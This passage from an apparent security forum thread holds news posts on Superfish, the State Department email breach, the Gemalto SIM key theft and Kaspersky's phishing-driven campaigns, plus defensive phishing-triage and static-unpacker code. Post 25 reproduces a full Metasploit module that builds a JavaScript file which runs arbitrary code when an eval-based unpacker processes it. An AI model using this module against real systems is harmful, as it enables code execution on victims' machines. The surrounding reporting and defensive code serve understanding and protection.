Users began complaining about Superfish in Lenovo's forums in the autumn, and the firm told the BBC that it was shipped "in a short window from October to December to help customers potentially discover interesting products while shopping". User feedback, it acknowledged, "was not positive". Last month, forum administrator Mark Hopkins told users that "due to some issues (browser pop up behaviour, for example)", the company had "temporarily removed Superfish from our consumer systems until such time as Superfish is able to provide a software build that addresses these issues". He added it had requested that Superfish issue an auto-update for "units already in market".

Superfish was designed to help users find products by visually analysing images on the web to find the cheapest ones. Such adware is widely regarded in the industry as a form of malware because of the way it interacts with a person's laptop or PC. Security expert from Surrey University Prof Alan Woodward said: "It is annoying. It is not acceptable. It pops up adverts that you never asked for. It is like Google on steroids. "This bit of software is particularly naughty. People have shown that it can basically intercept everything and it could be really misused."

According to security experts, it appears that Lenovo had given Superfish permission to issue its own certificates, allowing it to collect data over secure web connections, known in malware parlance as a man-in-the-middle attack. "If someone went to, say, the Bank of America then Superfish would issue its own certificate pretending to be the Bank of America and intercept whatever you are sending back and forth," said Prof Woodward. Ken Westin, senior analyst at security company Tripwire, agreed: "If the findings are true and Lenovo is installing their own self-signed certificates, they have not only betrayed their customers' trust, but also put them at increased risk."

Clean install

Although Lenovo has said that it has removed Superfish from new machines and disabled it from others, it was unclear what the situation would be for machines where it had already been activated. Prof Woodward said: "Lenovo is being very coy about this but it needs to explain how long it has been doing this, what the scale is and where all the data it has collected is being stored. "There will be remnants of it left on machines and Lenovo does not ship the disks that allow people to do a clean install."

It raises wider questions about the deals that computer manufacturers do with third parties and the amount of software that comes pre-installed on machines. Mr Westin said: "With increasingly security and privacy-conscious buyers, laptop and mobile phone manufacturers may well be doing themselves a disservice by seeking outdated advertising based monetisation strategies."

Users were particularly angry that they had not been told about the adware. One Lenovo forum user said: "It's not like they stuck it on the flier saying... we install adware on our computers so we can profit from our customers by using hidden software. "However, I now know this. I now will not buy any Lenovo laptop again."

The problem also caused a storm on Twitter, where both Lenovo and Superfish were among the most popular discussion topics.

Source
18. Email servers still compromised after THREE months

An attack against US State Department servers is still ongoing three months after the agency spotted miscreants inside its email system, it's reported. In November the State Department was forced to suspend its unclassified email systems after it was successfully infiltrated by hackers unknown. At the time the agency said its classified emails were unaffected by the hack. Now Bloomberg and the Wall Street Journal report multiple sources saying that the attack is still ongoing: the bad guys and girls still have remote access to internal computers. Every time sysadmins find and delete a malware infection, installed by the hackers, another variant pops up.

The point of failure was, we're told, a user clicking on a link to a dodgy website using an unpatched browser, leading to malicious remote-code execution. Once inside the network, the attackers spread out to the department's computers overseas, many of which now harbor malware. Remote access to email inboxes has been disabled, it's reported. IT staff can't switch off the network to freeze the infection because the computer systems must remain operational for security reasons.

Five sources report that the attacks are Russian in origin, with one former US intelligence officer claiming that Putin’s online warriors are just as good as Uncle Sam's. The secure email system is reportedly still safe, but unclassified emails can contain lots of juicy information – and hackers could masquerade as officials on the network to gain access to more sensitive documents. Messages regarding US policy on the Ukraine, and other files, have been swiped from the system, two sources report. The difficulty in blocking further attacks raises worrying possibilities for the rest of the government’s IT managers.

The State Department’s servers were compromised as part of a large-scale attack against US government systems, with the White House, the US Postal Service, and the National Weather Service all falling prey, albeit briefly. “We deal successfully with thousands of attacks every day,” State Department spokeswoman Marie Harf told the Journal in a statement. “We take any possible cyber intrusion very seriously - as we did with the one we discussed several months ago — and we deal with them in conjunction with other relevant government agencies.”

Given the amount the US spends on information security these days it seems amazing that the NSA can’t rustle up a few of its hackers so adept at attacking and subverting legitimate means of communications and focus on defense for a change. Since 2001 the US has publicly spent over $500bn on its intelligence services, and documents leaked by Edward Snowden show the NSA and CIA spent over $25bn in 2013 alone. It doesn’t seem as though the American taxpayer is getting value for money.

Source
19. The world's biggest SIM card manufacturer, Gemalto, revealed yesterday to have been hacked by the NSA and GCHQ, has taken a $470m hit in its stock price. Gemalto was caught unawares by the revelation that the US and UK intelligence agencies had compromised its systems, and stolen potentially millions of SIM card keys used to encrypt phone calls around the world. Gemalto supplies SIMs to 450 networks on Earth, from AT&T to T-Mobile, and launched an investigation. Speculation that the Dutch manufacturer may be forced to recall chips, incurring huge costs, caused its share price to fall eight per cent in early trading before recovering a little to four per cent down on closing.

Obtaining SIM card private keys allows intelligence agencies to decrypt intercepted calls without anyone knowing – not the users, the network operators nor the handset manufacturers. Communications eavesdropped today, yesterday or five years ago can be decoded once a SIM's Ki key is obtained.

The company issued a statement today in which it promised to get to the bottom of the hack: "Gemalto is especially vigilant against malicious hackers, and has detected, logged and mitigated many types of attempts over the years. At present we cannot prove a link between those past attempts and what was reported yesterday. “We take this publication very seriously and will devote all resources necessary to fully investigate and understand the scope of such sophisticated techniques.”

Incensed

Security watchers praised the company for its prompt and forthright response. But privacy and communications experts are incensed by the latest revelations about GCHQ/NSA warrantless mass surveillance. The World Wide Web Foundation has called for urgent steps to be taken to secure private calls and online communications. Its chief exec Anne Jellema commented: "The news that US and UK spy agencies hacked the network of a Dutch company to steal encryption keys for billions of SIM cards is truly shocking. "Possession of these keys would allow these agencies to access private calls, web browsing records and other online communications without any of the legal safeguards and processes in place to prevent abuses of power.”

Jellema argued that the surveillance would undermine trust in mobile payments, among other concerns. “This is yet another worrying sign that these agencies think they are above the law. Apart from its blatant disregard for multiple human rights, this foolish move undermines the security and future of the global mobile payments industry." She noted that any security weakness or backdoors into a cryptographic system might also be exploited by third-party cybercriminals and called for an investigation into GCHQ including "a full and frank disclosure as to why they hacked a private company, and one headquartered in an ally country."

Other security experts warned that other intelligence agencies may be up to the same tricks. Andrew Conway, research analyst at Cloudmark, said: “The ease with which the NSA and GCHQ were able to compromise all mobile communications is shocking. But there are other nation state actors with just as much determination and sophisticated hackers. In particular, China's Axiom Group has shown remarkable abilities to penetrate targets in the West.”

Not just the NSA?

He highlighted other worrying accounts of mobile companies being targeted: "Last year, mobile security company ESD revealed that they had detected a network of fake mobile phone towers intercepting communications near US military bases. It was assumed that whoever was responsible was just collecting metadata, because 3G and 4G communications are encrypted. Could it be that this was some foreign espionage agency with the ability to listen to US mobile phone calls? Or perhaps it was the NSA monitoring all civilian phone calls near military bases for possible terrorist activity? Regardless, it is clear that mobile communications have been badly compromised.”

A complete revamp of mobile comm security may eventually be required, Conway concluded. "In the short term organizations requiring secure voice communications can consider deploying mobile devices with another layer of encryption, such as Blackphone or Cryptophone. In the long term, we need to do a better job of end-to-end encryption of all mobile and fixed line communications - which will include not relying on a single master key for all communications."

Source
  20. This week's headlines have been security heavy thanks to the influx of news coming from Kaspersky's Security Analyst Summit. We've seen Kaspersky report everything from a $1bn cyber bank heist operation, to potentially NSA-sponsored and Middle Eastern advanced persistent threats. Specifically we saw threat research papers on the Carbanak, Equation and Desert Falcons attack campaigns. Carbanak is a banking-focused cyber operation that is believed to have stolen $1bn from 100 banks in more than 30 regions using specialist attack tools. Equation is a dangerous hack campaign, believed to have stemmed from the US National Security Agency, that uses a selection of attack tools, including one that can infect the operating systems on hard drives. Desert Falcons is a Middle Eastern cyber mercenary group that is believed to have infected thousands of Windows and Android devices with over 100 different malware variants. Each of these campaigns has its own specific implications for security professionals and the industry in general, but there is one unifying factor for me that is the most interesting: all three used phishing as a primary infection tactic. Phishing, for those who don't know, is an attack that aims to spread malware using infected messages that often masquerade as stemming from a trustworthy source. The message system used in phishing campaigns can include everything from Facebook posts and instant messages, to tweets and basic email. The campaigns are sometimes fairly basic and easy to see through, such as the Nigerian prince emails that circulate offering incredible sums of money in return for bank details, while others can include a social engineering element and are made to look like invoices or corporate communications. The attack strategy may sound simple enough to stop, but for me the trio of threats highlighted by Kaspersky show that most businesses still haven't addressed the phishing threat. 
There are likely to be several reasons why phishing still works so well. One of the most common that I hear from talking to industry professionals is that many businesses still assume that security is an out-of-the-box technological issue, not a cultural one. Despite constant warnings from security providers and government departments, many companies still assume that, if they have basic perimeter defences in place, they have ticked the security box and don't have to worry about cyber attacks, such as phishing. Sadly, this simply isn't the case. The Carbanak campaign is a particularly good example. Carbanak initially targets victims with spear phishing emails designed to look like legitimate banking communications. The messages contain malicious Microsoft Word and Control Panel Applet attachments that exploit flaws in Microsoft Office 2003, 2007 and 2010 (CVE-2012-0158 and CVE-2013-3906) and Microsoft Word (CVE-2014-1761) to execute the Carbanak backdoor. The initial infection didn't get the hackers access to the more secure internal systems they wanted to breach, but it did get them far enough into the network to begin a reconnaissance phase targeting bank employees, particularly systems administrators. From here, using information stolen during the reconnaissance phase, the attackers were able to get to the companies' crown jewels and steal vast sums of money. The key takeaway here is that firms need to back up their defence technology with robust cyber security awareness, using education programmes that not only teach staff how to spot and avoid falling victim to phishing messages, but how to report incidents to the IT team. Incidents will, of course, still occur; some of the social engineering behind phishing is seriously impressive and can lead to very realistic looking communications. But it would help dramatically to reduce the hackers' win rates and profit margins, a development I think everyone on the right side of the law would regard as positive. 
Hopefully, while bad, the discovery of Carbanak, Equation and Desert Falcons will at the very least make some firms aware of this. Although, considering my past experience covering the fallout of these attack campaigns, I'm not holding my breath. Source
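As an added example, not from the article above or from Kaspersky's reports: a small Python triage script that applies the indicators the article itself names (senders posing as a bank, legacy Word attachments, Control Panel Applet attachments) to constructed mail-gateway log lines. The internal domain `example-bank.com`, the log line format, the extension lists and the lookalike threshold are all assumptions made for the demo.

```python
"""Triage constructed mail-gateway log lines for spear-phishing indicators."""
import re
from dataclasses import dataclass

INTERNAL_DOMAIN = "example-bank.com"  # assumed internal domain (constructed)
# Attachment types that run code directly, e.g. Control Panel Applets (.cpl).
EXECUTABLE_EXT = {"cpl", "exe", "scr", "hta", "js", "vbs"}
# Binary Office formats that carried the exploits in the campaign described above.
LEGACY_OFFICE_EXT = {"doc", "xls", "ppt", "rtf"}

# Assumed log format: ts from=<addr> to=<addr> subject="<text>" attachments=<a.ext,b.ext>
LINE_RE = re.compile(
    r'^(?P<ts>\S+) from=(?P<from>\S+) to=(?P<to>\S+) '
    r'subject="(?P<subject>[^"]*)" attachments=(?P<att>\S*)$'
)

# Constructed sample log (not real traffic).
SAMPLE_LOG = """\
2015-02-18T09:12:44Z from=billing@example-bank.com to=admin@example-bank.com subject="Invoice 4471" attachments=invoice_4471.pdf
2015-02-18T09:13:01Z from=support@examp1e-bank.com to=sysadmin@example-bank.com subject="Urgent: account statement" attachments=statement.doc
2015-02-18T09:14:20Z from=hr@partner.example.org to=ops@example-bank.com subject="Payroll update" attachments=payroll.cpl
2015-02-18T09:15:05Z from=news@vendor.example.net to=ops@example-bank.com subject="Newsletter" attachments=
2015-02-18T09:16:30Z from=ceo@example-bank.com to=staff@example-bank.com subject="All hands" attachments=agenda.docx,slides.pptx
"""


@dataclass
class Finding:
    ts: str
    sender: str
    reasons: list
    severity: str


def levenshtein(a: str, b: str) -> int:
    """Edit distance, used to spot typo-squatted sender domains."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def sender_domain(addr: str) -> str:
    return addr.rsplit("@", 1)[-1].lower()


def is_lookalike(domain: str) -> bool:
    """A domain within two edits of ours, but not ours, is a spoofing candidate."""
    return domain != INTERNAL_DOMAIN and levenshtein(domain, INTERNAL_DOMAIN) <= 2


def triage_line(line: str):
    """Return a Finding for a suspicious line, or None if nothing stands out."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    domain = sender_domain(m["from"])
    external = domain != INTERNAL_DOMAIN
    reasons, severity = [], None
    if is_lookalike(domain):
        reasons.append(f"lookalike sender domain {domain}")
        severity = "high"
    for name in filter(None, m["att"].split(",")):
        ext = name.rsplit(".", 1)[-1].lower() if "." in name else ""
        if ext in EXECUTABLE_EXT:
            reasons.append(f"executable attachment {name}")
            severity = "high"
        elif ext in LEGACY_OFFICE_EXT and external:
            reasons.append(f"legacy Office attachment {name} from external sender")
            severity = severity or "medium"
    if not reasons:
        return None
    return Finding(m["ts"], m["from"], reasons, severity)


def triage(log_text: str) -> list:
    return [f for f in (triage_line(l) for l in log_text.splitlines()) if f]


if __name__ == "__main__":
    for f in triage(SAMPLE_LOG):
        print(f"{f.ts} {f.severity:6} {f.sender}: {'; '.join(f.reasons)}")
```

Running it against the constructed log flags two of the five messages: the typo-squatted `examp1e-bank.com` sender carrying a legacy `.doc`, and the external `.cpl` attachment. The rule set is deliberately narrow; it is the kind of first-pass signal that feeds the reporting and awareness process the article argues for, not a replacement for attachment sandboxing.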
  21. @alin63 the question is what you need; you can use Ubuntu or Lubuntu if you have a weaker PC. It depends on what you want to do, that is, what you use the PC for (browsing Facebook or working, etc.).
  22. @ILIE_2015_KILLER try, man, to write without Caps Lock on, because we can see just fine. On topic: Your suggestion is totally irrelevant (this is an IT Security forum); we understand that you are very religious, but still try to keep the discussion at the IT level. (possibly a troll) My vote is: Against.
  23. @Vehuiah can you give more details (here or in private) about what you are interested in, i.e. whether you have a company etc.; roughly what would you like?
  24. Update: Packet Fence 4.6.1 Changes: Various updates. Link: Download SHA1 sum: 9713cd5a59f4644dd6defa995afcf77cb977e8dc
  25.

```ruby
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
require 'msf/core/exploit/jsobfu'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::FILEFORMAT
  include Msf::Exploit::JSObfu

  def initialize(info = {})
    super(update_info(info,
      'Name'            => 'Javascript Injection for Eval-based Unpackers',
      'Description'     => %q{
        This module generates a Javascript file that executes arbitrary code
        when an eval-based unpacker is run on it. Works against js-beautify's
        P_A_C_K_E_R unpacker.
      },
      'Author'          => [ 'joev' ],
      'License'         => MSF_LICENSE,
      'References'      => [ ],
      'Platform'        => 'nodejs',
      'Arch'            => ARCH_NODEJS,
      'Privileged'      => false,
      'Targets'         => [['Automatic', {}]],
      'DisclosureDate'  => 'Feb 18 2015',
      'DefaultTarget'   => 0))

    register_options([
      OptString.new('FILENAME', [true, 'The file name.', 'msf.js']),
      OptString.new('CUSTOM_JS', [false, 'Custom Javascript payload.'])
    ], self.class)
  end

  def exploit
    p = js_obfuscate(datastore['CUSTOM_JS'] || payload.encoded)
    print_status("Creating '#{datastore['FILENAME']}' file...")
    file_create("eval(function(p,a,c,k,e,r){}((function(){ #{p} })(),''.split('|'),0,{}))")
  end
end
```

Source
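As an added defensive example, not part of the post or of the Metasploit module above: the module works because P_A_C_K_E_R-style unpackers evaluate the packed blob, so an immediately-invoked function passed in place of the payload string literal simply runs. The JavaScript below unpacks the "p,a,c,k,e,d" format statically instead: it accepts the outer call only when its four arguments are literals, decodes with the packer's own base-`a` word substitution, and never calls `eval`. The function names, the regular expression and the two sample strings (`PACKED_SAMPLE`, `INJECTED_SAMPLE`) are constructed for this demo.

```javascript
// Added example: eval-free unpacking of "p,a,c,k,e,d"-packed JavaScript.
// Function names and the two sample inputs are constructed for this demo.

// Matches the packer's outer call only when its arguments are literals:
// a quoted payload string, radix, word count and a quoted '|'-separated word list.
// It is a structural check, not a full JS parser; anything else is rejected.
const PACKED_RE =
  /eval\(function\(p,a,c,k,e,[dr]\)\{[\s\S]*?\}\('((?:[^'\\]|\\.)*)',\s*(\d+),\s*(\d+),\s*'((?:[^'\\]|\\.)*)'\.split\('\|'\)/;

const SIMPLE_ESCAPES = { n: '\n', r: '\r', t: '\t' };

// Decode the few escapes the packer emits inside its single-quoted literals.
function unescapeJsString(s) {
  return s.replace(/\\(.)/g, (_, ch) => (ch in SIMPLE_ESCAPES ? SIMPLE_ESCAPES[ch] : ch));
}

// The packer's own word-index encoding: base-a digits, values above 35 as letters via char code + 29.
function encodeBase(c, a) {
  const rest = c < a ? '' : encodeBase(Math.floor(c / a), a);
  const digit = c % a;
  return rest + (digit > 35 ? String.fromCharCode(digit + 29) : digit.toString(36));
}

// True only for a packed blob whose arguments are plain literals.
function isStaticallyPacked(src) {
  return PACKED_RE.test(src);
}

// Unpack without executing anything. Returns null, rather than falling back to
// eval, when the arguments are not literals (e.g. the IIFE injection above).
function unpackStatic(src) {
  const m = PACKED_RE.exec(src);
  if (!m) return null;
  let p = unescapeJsString(m[1]);
  const a = parseInt(m[2], 10);
  let c = parseInt(m[3], 10);
  const k = unescapeJsString(m[4]).split('|');
  while (c--) {
    if (k[c]) p = p.replace(new RegExp('\\b' + encodeBase(c, a) + '\\b', 'g'), k[c]);
  }
  return p;
}

// Constructed inputs: a benign packed snippet and an injection in the module's shape.
// If the injected function ever ran it would set a global flag; the static path never does.
const PACKED_SAMPLE = String.raw`eval(function(p,a,c,k,e,d){while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0(\'1\');2.3(\'1\')',62,4,'alert|hi|console|log'.split('|'),0,{}))`;
const INJECTED_SAMPLE = String.raw`eval(function(p,a,c,k,e,r){}((function(){ globalThis.unpackerRanPayload = true })(),''.split('|'),0,{}))`;

if (typeof require !== 'undefined' && require.main === module) {
  console.log(unpackStatic(PACKED_SAMPLE));   // alert('hi');console.log('hi')
  console.log(unpackStatic(INJECTED_SAMPLE)); // null: refused, nothing executed
}
```

The design point is that an unpacker is a parser, not an interpreter: when the blob does not have the literal shape the format promises, the safe answer is to refuse and hand the file to analysis, not to let the interpreter decide what the arguments evaluate to.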